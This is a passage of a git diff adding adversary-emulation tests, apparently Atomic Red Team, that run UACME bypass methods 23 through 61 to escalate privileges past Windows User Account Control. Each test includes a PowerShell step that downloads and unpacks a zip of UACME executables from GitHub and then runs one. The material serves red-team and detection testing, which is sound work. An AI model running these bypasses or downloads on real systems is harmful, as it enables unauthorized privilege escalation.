+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\33 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 34
+ auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
+ via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
+ Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\34 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 39
+ auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\39 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 56
+ auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\56 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 59
+ auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
+ DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
+ Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\59 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 61
+ auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
+ Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\61 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
T1218.003:
technique:
external_references:
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 74114f1c..19b5176d 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -30,6 +30,22 @@ Another bypass is possible through some lateral movement techniques if credentia
- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+- [Atomic Test #10 - UACME Bypass Method 23](#atomic-test-10---uacme-bypass-method-23)
+
+- [Atomic Test #11 - UACME Bypass Method 31](#atomic-test-11---uacme-bypass-method-31)
+
+- [Atomic Test #12 - UACME Bypass Method 33](#atomic-test-12---uacme-bypass-method-33)
+
+- [Atomic Test #13 - UACME Bypass Method 34](#atomic-test-13---uacme-bypass-method-34)
+
+- [Atomic Test #14 - UACME Bypass Method 39](#atomic-test-14---uacme-bypass-method-39)
+
+- [Atomic Test #15 - UACME Bypass Method 56](#atomic-test-15---uacme-bypass-method-56)
+
+- [Atomic Test #16 - UACME Bypass Method 59](#atomic-test-16---uacme-bypass-method-59)
+
+- [Atomic Test #17 - UACME Bypass Method 61](#atomic-test-17---uacme-bypass-method-61)
+
@@ -391,4 +407,564 @@ REM will tell it to ignore everything after %windir% and treat it just as a NOTE
+
+
+
+## Atomic Test #10 - UACME Bypass Method 23
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Leo Davidson derivative
+
+Type: Dll Hijack
+
+Method: IFileOperation
+
+Target: \system32\pkgmgr.exe
+
+Component: DismCore.dll
+
+Implementation: ucmDismMethod
+
+UCM Method: UacMethodDISM
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8ceab7a2-563a-47d2-b5ba-0995211128d7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\23 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #11 - UACME Bypass Method 31
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Enigma0x3
+
+Type: Shell API
+
+Method: Registry key manipulation
+
+Target: \system32\sdclt.exe
+
+Component: Attacker defined
+
+Implementation: ucmSdcltIsolatedCommandMethod
+
+UCM Method: UacMethodShellSdclt
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b0f76240-9f33-4d34-90e8-3a7d501beb15
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\31 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #12 - UACME Bypass Method 33
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: winscripting.blog
+
+Type: Shell API
+
+Method: Registry key manipulation
+
+Target: \system32\fodhelper.exe
+
+Component: Attacker defined
+
+Implementation: ucmShellRegModMethod
+
+UCM Method: UacMethodMsSettings2
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e514bb03-f71c-4b22-9092-9f961ec6fb03
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\33 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #13 - UACME Bypass Method 34
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: James Forshaw
+
+Type: Shell API
+
+Method: Environment variables expansion
+
+Target: \system32\svchost.exe via \system32\schtasks.exe
+
+Component: Attacker defined
+
+Implementation: ucmDiskCleanupEnvironmentVariable
+
+UCM Method: UacMethodDiskSilentCleanup
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 695b2dac-423e-448e-b6ef-5b88e93011d6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\34 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #14 - UACME Bypass Method 39
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Stefan Kanthak
+
+Type: Dll Hijack
+
+Method: .NET Code Profiler
+
+Target: \system32\mmc.exe
+
+Component: Attacker defined
+
+Implementation: ucmCorProfilerMethod
+
+UCM Method: UacMethodCorProfiler
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 56163687-081f-47da-bb9c-7b231c5585cf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\39 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #15 - UACME Bypass Method 56
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Hashim Jawad
+
+Type: Shell API
+
+Method: Registry key manipulation
+
+Target: \system32\WSReset.exe
+
+Component: Attacker defined
+
+Implementation: ucmShellRegModMethod
+
+UCM Method: UacMethodShellWSReset
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 235ec031-cd2d-465d-a7ae-68bab281e80e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\56 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #16 - UACME Bypass Method 59
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: James Forshaw
+
+Type: AppInfo ALPC
+
+Method: RAiLaunchAdminProcess and DebugObject
+
+Target: Attacker defined
+
+Component: Attacker defined
+
+Implementation: ucmDebugObjectMethod
+
+UCM Method: UacMethodDebugObject
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** dfb1b667-4bb8-4a63-a85e-29936ea75f29
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\59 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #17 - UACME Bypass Method 61
+Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
+Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
+
+Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
+
+Type: Shell API
+
+Method: Registry key manipulation
+
+Target: \system32\slui.exe, \system32\changepk.exe
+
+Component: Attacker defined
+
+Implementation: ucmShellRegModMethod
+
+UCM Method: UacMethodDebugObject
+
+https://github.com/hfiref0x/UACME
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7825b576-744c-4555-856d-caf3460dc236
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| uacme_exe | Path to uacme executable | Path | %temp%\uacme\61 Akagi64.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+"#{uacme_exe}"
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: UACME executable must exist on disk at specified location (#{uacme_exe})
+##### Check Prereq Commands:
+```powershell
+$tempPath = cmd /c echo #{uacme_exe}
+if (Test-Path "$tempPath") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+Remove-Item $env:TEMP\uacme.zip -Force
+```
+
+
+
+